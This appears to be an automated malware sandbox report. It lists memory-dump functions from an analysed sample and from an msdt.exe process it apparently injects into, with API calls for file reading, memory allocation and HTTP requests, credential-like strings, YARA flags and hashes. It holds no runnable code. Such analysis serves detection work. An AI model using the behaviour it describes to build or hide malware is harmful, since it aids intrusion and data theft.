                                                                                            0x00416393
                                                                                            0x00416396
                                                                                            0x004164a4
                                                                                            0x004164aa
                                                                                            0x004164b5
                                                                                            0x004164bb
                                                                                            0x004164c6
                                                                                            0x004164d7
                                                                                            0x004164dd
                                                                                            0x004164e8
                                                                                            0x004164ee
                                                                                            0x004164f9
                                                                                            0x004164fe
                                                                                            0x00416501
                                                                                            0x00416504
                                                                                            0x00416506
                                                                                            0x00416511
                                                                                            0x00416516
                                                                                            0x00416516
                                                                                            0x0041651a
                                                                                            0x00416525
                                                                                            0x0041652b
                                                                                            0x00416536
                                                                                            0x0041653b
                                                                                            0x0041653e
                                                                                            0x00416541
                                                                                            0x00416543
                                                                                            0x0041654e
                                                                                            0x00416553
                                                                                            0x00416553
                                                                                            0x00416556
                                                                                            0x00416557
                                                                                            0x00416561
                                                                                            0x0041639c
                                                                                            0x004163a0
                                                                                            0x004163ac
                                                                                            0x004163b7
                                                                                            0x004163bd
                                                                                            0x004163c1
                                                                                            0x004163c8
                                                                                            0x004163ce
                                                                                            0x004163d2
                                                                                            0x004163d9
                                                                                            0x004163e3
                                                                                            0x004163ea
                                                                                            0x004163f0
                                                                                            0x004163f4
                                                                                            0x004163fb
                                                                                            0x00416401
                                                                                            0x00416405
                                                                                            0x0041640c
                                                                                            0x00416411
                                                                                            0x00416414
                                                                                            0x00416417
                                                                                            0x00416419
                                                                                            0x0041641c
                                                                                            0x00416428
                                                                                            0x00416433
                                                                                            0x00416438
                                                                                            0x00416438
                                                                                            0x0041643c
                                                                                            0x00416440
                                                                                            0x00416447
                                                                                            0x0041644d
                                                                                            0x00416451
                                                                                            0x00416458
                                                                                            0x0041645d
                                                                                            0x00416460
                                                                                            0x00416463
                                                                                            0x00416465
                                                                                            0x00416467
                                                                                            0x00416474
                                                                                            0x0041647f
                                                                                            0x00416484
                                                                                            0x00416484
                                                                                            0x00416487
                                                                                            0x00416488
                                                                                            0x0041648c
                                                                                            0x00416492
                                                                                            0x00416562
                                                                                            0x00416567
                                                                                            0x00416571
                                                                                            0x00416314
                                                                                            0x00416314
                                                                                            0x0041631a
                                                                                            0x0041631d
                                                                                            0x00416324
                                                                                            0x0041632b
                                                                                            0x00416332
                                                                                            0x00416339
                                                                                            0x0041633c
                                                                                            0x00416342
                                                                                            0x00416347
                                                                                            0x0041634a
                                                                                            0x0041634d
                                                                                            0x0041634f
                                                                                            0x00416355
                                                                                            0x00416358
                                                                                            0x0041635e
                                                                                            0x00416362
                                                                                            0x00416368
                                                                                            0x0041636c
                                                                                            0x00416373
                                                                                            0x00416378
                                                                                            0x0041637f
                                                                                            0x00416383
                                                                                            0x00416385
                                                                                            0x00416386
                                                                                            0x00416387
                                                                                            0x00000000
                                                                                            0x00416387
                                                                                            0x00416358
                                                                                            0x0041634f
                                                                                            0x0041657f
                                                                                            0x0041629f
                                                                                            0x0041629f
                                                                                            0x004162aa
                                                                                            0x004162ab
                                                                                            0x004162ad
                                                                                            0x004162af
                                                                                            0x004162b1
                                                                                            0x004162b9
                                                                                            0x004162c9
                                                                                            0x004162c9

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :$Port:User :$Server:$User :$i;w|
                                                                                            • API String ID: 0-407555915
                                                                                            • Opcode ID: 69ecba5addc8dece01f55a13fb389ea4f0e30dc16f388ca3a45d156f438493b1
                                                                                            • Instruction ID: df5822074f99757eebe8c36bef244144e9795a7748160069533d1e335a1b06ab
                                                                                            • Opcode Fuzzy Hash: 69ecba5addc8dece01f55a13fb389ea4f0e30dc16f388ca3a45d156f438493b1
                                                                                            • Instruction Fuzzy Hash: A7619BB2801208ABCF11DFA9CC919DF77BCEF19314F04859EE54967101DA35EA98CBE9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406A94, Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51da59ea90af1fc6a8f4fd99c046fc8a8cc23f0822bed2630beef142ead17234
                                                                                            • Instruction ID: 190d3140a32617d9e811ac84af348f4a04116302b86f7414fd12fdfc823d210d
                                                                                            • Opcode Fuzzy Hash: 51da59ea90af1fc6a8f4fd99c046fc8a8cc23f0822bed2630beef142ead17234
                                                                                            • Instruction Fuzzy Hash: E2C08C22E5E18E02E6205D0838811F9FB688B13126E6827EBECC4735009082C4324388
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: msdt.exe PID: 5876 Parent PID: 3388 msdt.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 007982AC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,00793A01,?,?,?,?,00793A01,FFFFFFFF,?,B=y,?,00000000), ref: 007982A5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: M;y
                                                                                            • API String ID: 2738559852-2456346913
                                                                                            • Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                                                            • Instruction ID: 8a4cd47cb4203a65d5f37ce69ea875ab67b04a6b504baa32edcd151630323a78
                                                                                            • Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                                                            • Instruction Fuzzy Hash: AC11F772200204ABCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E9118BE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007981B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00793B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00793B87,007A002E,00000000,00000060,00000000,00000000), ref: 007981FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: .z`
                                                                                            • API String ID: 823142352-1441809116
                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                            • Instruction ID: 767abb5a6ecbb71803fe1fb1aaa03c78564a8a6cc7dabf797b8102e49fbbb11e
                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                            • Instruction Fuzzy Hash: F5F0B6B2200108ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007982E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtClose.NTDLL( =y,?,?,00793D20,00000000,FFFFFFFF), ref: 00798305
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: =y
                                                                                            • API String ID: 3535843008-2218598100
                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                            • Instruction ID: b434e19081baee88e7b34fcee5703c97456f508d112c72ada8895bf4b2734be7
                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                            • Instruction Fuzzy Hash: FBD01275200214BBDB10EF99DC45ED7775CEF48750F154455BA189B342C930F90086E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,00793A01,?,?,?,?,00793A01,FFFFFFFF,?,B=y,?,00000000), ref: 007982A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                            • Instruction ID: 0c0ce931eee34b7a3ec96fb708d359f7e4c33bcda582f70cc472b1afa180555e
                                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                            • Instruction Fuzzy Hash: FFF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0079838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00782D11,00002000,00003000,00000004), ref: 007983C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                                                            • Instruction ID: 20ccbb69a76b6f7a3419b21d6ac1ad2102495c5a638ada888612b05b90ac49df
                                                                                            • Opcode Fuzzy Hash: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
                                                                                            • Instruction Fuzzy Hash: C2F0F2B6200208ABCB18DF99DC95EAB77A9BF8C350F158159BE1897341C630E910CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00798390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00782D11,00002000,00003000,00000004), ref: 007983C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                            • Instruction ID: 4036192634476b23a236b36677930b7c287acc18efb55b7471ddbd8143e2423e
                                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                            • Instruction Fuzzy Hash: D9F015B2200208ABCB14DF89DC81EEB77ADAF8C750F118148BE0897341CA30F810CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 505decdac9093f10dfe6593ebb11ef350665fb079d715a3ee1176c3c6af10f10
                                                                                            • Instruction ID: 17f977dd307ce3f9d1dbcee86cf176a90f1d581703ee9d937433c2f74a40a691
                                                                                            • Opcode Fuzzy Hash: 505decdac9093f10dfe6593ebb11ef350665fb079d715a3ee1176c3c6af10f10
                                                                                            • Instruction Fuzzy Hash: 079002A120201007610571594514616401B97F4259B61C021E51055A0DC565D8D17165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3267a6dfa128df0e6de9648e3ffa3b383c6106a84ebb6c6ed36bfdc42011a4c8
                                                                                            • Instruction ID: bbb5859cb6e60baefb3ac6d253f2e18fbf1fa3e7b783202d7953f4e648f2cf94
                                                                                            • Opcode Fuzzy Hash: 3267a6dfa128df0e6de9648e3ffa3b383c6106a84ebb6c6ed36bfdc42011a4c8
                                                                                            • Instruction Fuzzy Hash: 34900265211010072105A5590704507005797E93A9361C021F5106560CD661D8A17161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 64e867d97bcf77e3d59679b5f59979e488b39c2811b5b182155da1998a162890
                                                                                            • Instruction ID: 33b59fb1c6db069cc111d0282dd1ecbafc2a7cb7db33cfb507dc38c9ce34ab2b
                                                                                            • Opcode Fuzzy Hash: 64e867d97bcf77e3d59679b5f59979e488b39c2811b5b182155da1998a162890
                                                                                            • Instruction Fuzzy Hash: 9290027120101846F10061594504B46001697F4359F61C016E4215664D8655D8917561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 74a5ae90ebf3318e93e28d29e09a7397bf05ac9858045d672a96042e6ebe6fbc
                                                                                            • Instruction ID: 5c7765ed79b1ebb89d4ba767fee6bebd35266a57f476115fa87770f948aa74aa
                                                                                            • Opcode Fuzzy Hash: 74a5ae90ebf3318e93e28d29e09a7397bf05ac9858045d672a96042e6ebe6fbc
                                                                                            • Instruction Fuzzy Hash: AA90027120109806F1106159850474A001697E4359F65C411E8515668D86D5D8D17161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 285c06eb303027de748d58b3fa4f5bbecc8cd45c6e4e2cac64d03e970a282fba
                                                                                            • Instruction ID: 768156a74d57c54b1c1ff2466abaddcb5a3b920c80bb7c8ece55d4a5cb65ef97
                                                                                            • Opcode Fuzzy Hash: 285c06eb303027de748d58b3fa4f5bbecc8cd45c6e4e2cac64d03e970a282fba
                                                                                            • Instruction Fuzzy Hash: 2D90027120505846F14071594504A46002697E435DF61C011E41556A4D9665DD95B6A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 18455dacf9fc5689fb3b3fd08cc6dcd0ff075926e61244b289f473667c74fa06
                                                                                            • Instruction ID: afa35d17ecc795716f9e49a8ef86afc609ee31ad5e260d58bf297131d718fa3b
                                                                                            • Opcode Fuzzy Hash: 18455dacf9fc5689fb3b3fd08cc6dcd0ff075926e61244b289f473667c74fa06
                                                                                            • Instruction Fuzzy Hash: D090027120101806F1807159450464A001697E5359FA1C015E4116664DCA55DA9977E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2bd34c4379138296ab72f7214f7760f4662b754b8e37c13b43a7b38f21dd6035
                                                                                            • Instruction ID: f57bc53d3ccf723b7d9ac2d809e989f6a6817f9300f685a89c893b3219993857
                                                                                            • Opcode Fuzzy Hash: 2bd34c4379138296ab72f7214f7760f4662b754b8e37c13b43a7b38f21dd6035
                                                                                            • Instruction Fuzzy Hash: 8C90027131115406F11061598504706001697E5259F61C411E4915568D86D5D8D17162
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3e27469537591378dd44b4b8df3d1ca190389423e95b8bf1d78beb84fbe4cbaa
                                                                                            • Instruction ID: 8f11565d318c79732533715f74a95f848a510b7d9152f0bdd8cb91430a069a4d
                                                                                            • Opcode Fuzzy Hash: 3e27469537591378dd44b4b8df3d1ca190389423e95b8bf1d78beb84fbe4cbaa
                                                                                            • Instruction Fuzzy Hash: 1F90026921301006F1807159550860A001697E525AFA1D415E4106568CC955D8A97361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: baa658a5bae22d70a12ada4f27c35fef87c3a8f8f3520cf2568404409d92cde0
                                                                                            • Instruction ID: 639b6f4be135b1d452e0abc32425a09d60cc3215053d157942964699501c6c0c
                                                                                            • Opcode Fuzzy Hash: baa658a5bae22d70a12ada4f27c35fef87c3a8f8f3520cf2568404409d92cde0
                                                                                            • Instruction Fuzzy Hash: 2C90027120101406F10065995508646001697F4359F61D011E9115565EC6A5D8D17171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8e5eee3642f49164936aa773e869017df444721d2e72067c0946b1f1d046cf89
                                                                                            • Instruction ID: 45096513465528e2ccc9817ae2805fe58cfa11d681766da70360c2f77d403544
                                                                                            • Opcode Fuzzy Hash: 8e5eee3642f49164936aa773e869017df444721d2e72067c0946b1f1d046cf89
                                                                                            • Instruction Fuzzy Hash: BD900261242051567545B15945045074017A7F42997A1C012E5505960C8566E896F661
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b84db1945b14f357b9ffa16c3a157cdd61dda8f3c7f055c6c63cb61c324ef0ba
                                                                                            • Instruction ID: 87cbeafdeac7ab67303267e49320508171c3fd3ad6f1a9af703075386dbed11e
                                                                                            • Opcode Fuzzy Hash: b84db1945b14f357b9ffa16c3a157cdd61dda8f3c7f055c6c63cb61c324ef0ba
                                                                                            • Instruction Fuzzy Hash: 9390027120101417F11161594604707001A97E4299FA1C412E4515568D9696D992B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: dfadb1390327239bdaf7a0d8cc11a4d15dfa32bcff9c2baef0839e54f84e01d0
                                                                                            • Instruction ID: c802c08f6d589b8915b9b4ec0d7b283598760b73cfe0a6c2b001e169f1084c13
                                                                                            • Opcode Fuzzy Hash: dfadb1390327239bdaf7a0d8cc11a4d15dfa32bcff9c2baef0839e54f84e01d0
                                                                                            • Instruction Fuzzy Hash: DE9002A134101446F10061594514B060016D7F5359F61C015E5155564D8659DC927166
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 606a815e125773eae02cf33fd9c575e39ce4feaf9de53102b532fad40bae9b41
                                                                                            • Instruction ID: 49daf335a5d9fa823c2645eedfe3712ad623f89e2b89750ab51764793484c9a1
                                                                                            • Opcode Fuzzy Hash: 606a815e125773eae02cf33fd9c575e39ce4feaf9de53102b532fad40bae9b41
                                                                                            • Instruction Fuzzy Hash: FB9002B120101406F14071594504746001697E4359F61C011E9155564E8699DDD576A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3ee4a98e3c6b43593ad22f24c7644b2534ea1773fc8c2e03a4b7c20dad723cff
                                                                                            • Instruction ID: 54cd9a9ea7c2df51dea37f35ca7b059596ed940667dc7052af520af675944a57
                                                                                            • Opcode Fuzzy Hash: 3ee4a98e3c6b43593ad22f24c7644b2534ea1773fc8c2e03a4b7c20dad723cff
                                                                                            • Instruction Fuzzy Hash: 9790026121181046F20065694D14B07001697E435BF61C115E4245564CC955D8A17561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007988C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00798928
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.477312798.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HttpOpenRequest
                                                                                            • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                            • API String ID: 1984915467-4016285707
                                                                                            • Opcode ID: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                                                                            • Instruction ID: 96fa540b5612060c0c1318174fd988c58aa5ccd67cec8af9b253c7b156457810
                                                                                            • Opcode Fuzzy Hash: 4cfb9678fb708ccf4b305b7de459e0cb374a3b63d560b69bc85e9c03fd5ad30e
                                                                                            • Instruction Fuzzy Hash: 1501E5B2A05119AFCB14DF98D841DEF7BB9EB49210F158288FD48A7205D634EE10CBE2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 007988B6, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON
